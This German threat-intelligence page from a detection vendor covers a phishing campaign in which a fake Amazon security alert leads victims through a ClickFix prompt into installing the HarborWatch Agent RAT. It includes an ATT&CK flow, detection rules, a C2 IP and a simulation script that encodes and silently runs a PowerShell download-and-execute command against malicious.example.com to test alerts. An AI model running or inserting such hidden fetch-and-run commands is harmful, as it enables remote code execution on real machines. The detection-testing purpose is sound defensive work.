SOC Prime Bias: Mittel

09 Jun 2026 13:04 UTC
newspaper icon cofense.com

Von gefälschter Amazon-Sicherheitswarnung zur Lieferung des HarborWatch-Agenten

Author Photo
SOC Prime Team linkedin icon Folgen
Von gefälschter Amazon-Sicherheitswarnung zur Lieferung des HarborWatch-Agenten
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Zusammenfassung

Der Bericht beschreibt eine Phishing-Kampagne, die um eine gefälschte Amazon-Sicherheitswarnung herum aufgebaut ist und Opfer dazu verleitet, einen PowerShell-Befehl über eine ClickFix-artige Aufforderung auszuführen. Dieser Befehl lädt eine bösartige ausführbare Datei namens mysql.exeherunter, die in Wirklichkeit der HarborWatch Agent RAT ist. Sobald sie gestartet wird, verbindet sich die Malware mit einem Command-and-Control-Server und übermittelt Hostinformationen. Der Betrieb stützt sich auf ähnlich aussehende Domains und eine vom Benutzer gesteuerte Selbstinfektionsmethode, um traditionelle anlagenbasierte Erkennungen zu vermeiden.

Untersuchung

Cofense verfolgte die Kampagne von der gefälschten Absenderadresse über die bösartigen Domains, den PowerShell-Downloader und die endgültige Malware-Nutzlast. Die dynamische Analyse von mysql.exe zeigte ausgehende Kommunikation mit einem Command-and-Control-Server bei 185.193.127.44 und die Nutzung der API-Pfade /api/agent/tasks/ and /api/heartbeat. Die Speicheranalyse enthüllte auch den Bezeichner HarborWatchAgent/c-1.1.1.

Minderung

Organisationen sollten die identifizierten bösartigen Domains und IP-Adressen blockieren, die Ausführung kodierter PowerShell-Befehle einschränken, die unerwartete Erstellung von mysql.exe im Temp -Verzeichnis überwachen und E-Mail-Verteidigungen gegen Markenimitationen und gefälschte Warnungen stärken.

Antwort

Wird diese Aktivität erkannt, sollte der betroffene Endpunkt isoliert, der HarborWatch Agent-Prozess beendet, forensische Beweise gesammelt und eine indikatorbasierte Blockierung im gesamten Umfeld bereitgestellt werden. Benutzer sollten ebenfalls über die gefälschte Amazon-Sicherheitswarnung informiert und Phishing-Schutzmaßnahmen aktualisiert werden, um ähnliche Köder zu erkennen.

"graph TB %% Class definitions classDef action fill:#99ccff classDef malware fill:#ff6666 classDef process fill:#ffcc99 classDef file fill:#cccccc %% Nodes initial_access_phishing["<b>Aktion</b> – <b>T1566.002 Spearphishing Link</b><br/>E-Mail scheint von Amazon zu stammen und enthält einen bösartigen Bestätigungslink."] class initial_access_phishing action user_execution_malicious_link["<b>Aktion</b> – <b>T1204.001 Benutzer-Ausführung: Bösartiger Link</b><br/>Das Opfer klickt auf den Link und gelangt auf eine Seite, die es anweist, einen PowerShell-Befehl zu kopieren und einzufügen."] class user_execution_malicious_link action user_execution_copy_paste["<b>Aktion</b> – <b>T1204.004 Benutzer-Ausführung: Kopieren und Einfügen</b><br/>Kopierter PowerShell-Befehl wird lokal ausgeführt."] class user_execution_copy_paste action obfuscation_obfuscated_files["<b>Aktion</b> – <b>T1027 Verschleierte Dateien oder Informationen</b> & <b>T1027.018 Unsichtbares Unicode</b><br/>PowerShell-Befehl ist base64u2011kodiert und enthält versteckte Unicode-Zeichen."] class obfuscation_obfuscated_files action deobfuscate_decode["<b>Aktion</b> – <b>T1140 Deobfuscate/Decode Dateien oder Informationen</b><br/>Befehl dekodiert die Nutzlast zur Laufzeit."] class deobfuscate_decode action hide_artifact_hidden_window["<b>Aktion</b> – <b>T1564.003 Verstecktes Fenster</b><br/>PowerShell wird mit -w hidden ausgeführt, um die UI zu vermeiden."] class hide_artifact_hidden_window action ingress_tool_transfer["<b>Aktion</b> – <b>T1105 Werkzeugübertragung über Eintrittspunkt</b><br/>Das Skript lädt ein zweites PowerShell-Skript (code.txt) von einem Remote-Server herunter."] class ingress_tool_transfer action server_software_component["<b>Aktion</b> – <b>T1505 Server-Software-Komponente</b><br/>Zweites Skript ruft eine Nutzlast (mysql.exe) ab und führt sie aus, die in %TEMP% abgelegt wurde."] class server_software_component action remote_access_tool["<b>Malware</b> – <b>T1219 Remote-Zugriffswerkzeug</b><br/>Angepasster RAT namens HarborWatch Agent wird ausgeführt."] class remote_access_tool malware discovery_security_software["<b>Aktion</b> – <b>T1518.001 Sicherheitssoftware-Erkennung</b><br/>RAT sammelt Informationen über die Sicherheitssoftware."] class discovery_security_software action discovery_hardware["<b>Aktion</b> – <b>T1592.001 Hardware-Erkennung</b><br/>RAT erfasst Hardware-Details des Hosts."] class discovery_hardware action discovery_network_appliances["<b>Aktion</b> – <b>T1590.006 Netzwerksicherheitsgeräte</b><br/>RAT zählt Netzwerksicherheitsgeräte auf."] class discovery_network_appliances action discovery_log_enumeration["<b>Aktion</b> – <b>T1654 Protokoll-Aufzählung</b><br/>RAT zählt Ereignisprotokolle auf."] class discovery_log_enumeration action discovery_threat_vendor["<b>Aktion</b> – <b>T1681 Bedrohungsdatenanbieter-Daten durchsuchen</b><br/>RAT sucht nach Bedrohungsinformationen."] class discovery_threat_vendor action c2_bidirectional["<b>Aktion</b> – <b>T1102.002 Webdienst-Bidirektionale Kommunikation</b><br/>Daten werden über HTTPS an den C2-Server gesendet."] class c2_bidirectional action c2_oneway["<b>Aktion</b> – <b>T1102.003 Webdienst-Einwegkommunikation</b><br/>Zusätzliche Anweisungen werden über HTTPS abgerufen."] class c2_oneway action c2_dynamic_resolution["<b>Aktion</b> – <b>T1568 Dynamische Auflösung</b><br/>RAT löst C2-Domänen zur Laufzeit auf."] class c2_dynamic_resolution action c2_dga["<b>Aktion</b> – <b>T1568.002 Domänenerzeugungsalgorithmen</b><br/>Domänenliste wird algorithmisch generiert."] class c2_dga action c2_dead_drop_resolver["<b>Aktion</b> – <b>T1102.001 Dead-Drop-Resolver</b><br/>Ruft zusätzliche C2-Anweisungen von einer Dead-Drop-Seite ab."] class c2_dead_drop_resolver action exfiltration_c2["<b>Aktion</b> – <b>T1041 Exfiltration über C2-Kanal</b><br/>Gesammelte Informationen werden über denselben Webkanal exfiltriert."] class exfiltration_c2 action exfiltration_alternative["<b>Aktion</b> – <b>T1048 Exfiltration über alternatives Protokoll</b><br/>Alternatives Protokoll wird für die Datenexfiltration verwendet."] class exfiltration_alternative action discovery_cloud_dashboard["<b>Aktion</b> – <b>T1538 Cloud-Service-Dashboard</b><br/>Daten werden auf einem chinesischsprachigen Web-Panel (Harbor Sentinel) angezeigt."] class discovery_cloud_dashboard action %% Connections initial_access_phishing –>|führt zu| user_execution_malicious_link user_execution_malicious_link –>|führt zu| user_execution_copy_paste user_execution_copy_paste –>|löst aus| obfuscation_obfuscated_files obfuscation_obfuscated_files –>|dekodiert durch| deobfuscate_decode deobfuscate_decode –>|führt aus| hide_artifact_hidden_window hide_artifact_hidden_window –>|lädt herunter| ingress_tool_transfer ingress_tool_transfer –>|lädt herunter| server_software_component server_software_component –>|führt aus| remote_access_tool remote_access_tool –>|führt aus| discovery_security_software remote_access_tool –>|führt aus| discovery_hardware remote_access_tool –>|führt aus| discovery_network_appliances remote_access_tool –>|führt aus| discovery_log_enumeration remote_access_tool –>|führt aus| discovery_threat_vendor remote_access_tool –>|kommuniziert über| c2_bidirectional remote_access_tool –>|erhält über| c2_oneway c2_bidirectional –>|verwendet| c2_dynamic_resolution c2_dynamic_resolution –>|verwendet| c2_dga c2_oneway –>|verwendet| c2_dead_drop_resolver remote_access_tool –>|exfiltriert über| exfiltration_c2 exfiltration_c2 –>|kann auch verwenden| exfiltration_alternative remote_access_tool –>|berichtet an| discovery_cloud_dashboard "

Angriffsablauf

Erkennungen

Mögliche ClickFix-Angriffsmuster in der Befehlszeile (via cmdline)

SOC Prime Team
09. Juni 2026

Anzeigen

Die Möglichkeit der Ausführung durch versteckte PowerShell-Befehlszeilen (via cmdline)

SOC Prime Team
09. Juni 2026

Anzeigen

Verdächtige PowerShell-Strings (via cmdline)

SOC Prime Team
09. Juni 2026

Anzeigen

Verdächtige PowerShell-Strings (via PowerShell)

SOC Prime Team
09. Juni 2026

Anzeigen

Verdächtige .NET-Methodenaufrufe von PowerShell (via PowerShell)

SOC Prime Team
09. Juni 2026

Anzeigen

IOCs (HashSha256) zum Erkennen: Von gefälschtem Amazon-Sicherheitsalarm bis zur HarborWatch Agent ClickFix-Zustellung eines benutzerdefinierten Monitoring RAT

SOC Prime AI-Regeln
09. Juni 2026

Anzeigen

IOCs (HashMd5) zum Erkennen: Von gefälschtem Amazon-Sicherheitsalarm bis zur HarborWatch Agent ClickFix-Zustellung eines benutzerdefinierten Monitoring RAT

SOC Prime AI-Regeln
09. Juni 2026

Anzeigen

IOCs (SourceIP) zum Erkennen: Von gefälschtem Amazon-Sicherheitsalarm bis zur HarborWatch Agent ClickFix-Zustellung eines benutzerdefinierten Monitoring RAT

SOC Prime AI-Regeln
09. Juni 2026

Anzeigen

IOCs (DestinationIP) zum Erkennen: Von gefälschtem Amazon-Sicherheitsalarm bis zur HarborWatch Agent ClickFix-Zustellung eines benutzerdefinierten Monitoring RAT

SOC Prime AI-Regeln
09. Juni 2026

Anzeigen

Ausführung von mysql.exe mit spezifischen Passwort-Argument [Windows-Prozesserstellung]

SOC Prime AI-Regeln
09. Juni 2026

Anzeigen

HarborWatch Agent C2-Kommunikations-Erkennung [Windows-Netzwerkverbindung]

SOC Prime AI-Regeln
09. Juni 2026

Anzeigen

Erkennung der PowerShell-Ausführung mit Verschleierung und verstecktem Fenster [Windows PowerShell]

SOC Prime AI-Regeln
09. Juni 2026

Anzeigen

Simulationsausführung

Voraussetzung: Der Telemetrie- und Basislinien-Pre-Flight-Check muss erfolgreich bestanden wurden sein.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der gegnerischen Technik (TTP), die zur Auslösung der Erkennungsregel entwickelt wurde. Die Befehle und die Erzählung MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, genau die Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.

  • Angriffserzählung & Befehle:
    Ein Angreifer hat sich Zugang zu einem Endpunkt verschafft und möchte eine bösartige Nutzlast herunterladen und ausführen, während er vor dem Benutzer verborgen bleibt. Er erstellt eine einzeilige PowerShell, die:

    1. läuft ohne Profil (-nop) um das Laden von Benutzerprofilen zu vermeiden.
    2. startet in einem versteckten Fenster (-w hidden) um eine UI-Aufdeckung zu verhindern (T1564.003).
    3. Betütt ein Base64-kodiertes Reverse-Shell-Skript, um einfache Zeichenfolgenerkennung zu umgehen (T1027.010).
    4. Führt das dekodierte Skript über -EncodedCommandaus, unter Nutzung von PowerShell als signierte Binärdatei (T1218).

    Die gefertigte Befehlszeile entspricht den CommandLine|enthält -Filtern der Sigma-Regel, wodurch der erwartete Alarm ausgelöst wird.

  • Regression Test Skript:

    # -------------------------------------------------
# Bösartige PowerShell-Ausführung, die die Sigma-Regel triggern sollte
# -------------------------------------------------
$payload = 'IEX (New-Object Net.WebClient).DownloadString("http://malicious.example.com/payload.ps1")'
$b64 = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$cmd = "-nop -w hidden -EncodedCommand $b64"
Start-Process -FilePath "$env:SystemRootSystem32WindowsPowerShellv1.0powershell.exe" `
    -ArgumentList $cmd `
    -WindowStyle Hidden
# Ende des Skripts

  • Bereinigungskommandos:

    # Beenden Sie alle verbleibenden böswilligen PowerShell-Prozesse
Get-Process -Name powershell -ErrorAction SilentlyContinue | Stop-Process -Force

# Entfernen Sie alle temporären Dateien (keine in diesem Fall erstellt)
# Löschen Sie die Base64-Payload-Variable aus der Sitzung (optional)
Remove-Variable -Name b64 -ErrorAction SilentlyContinue

Treten Sie der Detection as Code-Plattform von SOC Prime bei um die Sichtbarkeit der für Ihr Unternehmen relevantesten Bedrohungen zu verbessern. Um Ihnen den Einstieg zu erleichtern und unmittelbaren Mehrwert zu erzielen, buchen Sie jetzt ein Treffen mit den Experten von SOC Prime.

Kostenlos beitreten